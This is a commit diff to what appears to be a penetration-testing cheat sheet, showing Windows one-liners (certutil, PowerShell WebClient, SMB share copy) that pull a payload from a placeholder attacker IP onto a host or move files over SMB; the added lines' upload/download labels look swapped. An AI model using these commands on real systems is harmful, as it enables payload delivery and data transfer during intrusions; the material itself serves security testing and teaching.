Update README.md
This commit is contained in:
@@ -1396,8 +1396,12 @@ certutil -split -f -urlcache http://{IP ADDRESS}/{FILE}
|
|||||||
# Windows - Download file using powershell
|
# Windows - Download file using powershell
|
||||||
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
|
powershell -c "(new-object System.Net.WebClient).DownloadFile('http://{IP ADDRESS}/{FILE.exe}','C:\Users\{USER}\{FILE.exe}')"
|
||||||
|
|
||||||
# SMB SHARE
|
# SMB SHARE UPLOAD FILE
|
||||||
\\{IP ADDRESS}\share\{FILE}
|
copy \\{IP ADDRESS}\share\{FILE}
|
||||||
|
|
||||||
|
# SMB SHARE DOWNLAOD FILE
|
||||||
|
net use z: \\{IP ADDRESS}\share\
|
||||||
|
copy {FILE} z:
|
||||||
|
|
||||||
# {IP ADDRESS}: IP Address of the client from step one
|
# {IP ADDRESS}: IP Address of the client from step one
|
||||||
# {FILE}: The payload to be transferred
|
# {FILE}: The payload to be transferred
|
||||||
|
|||||||
Reference in New Issue
Block a user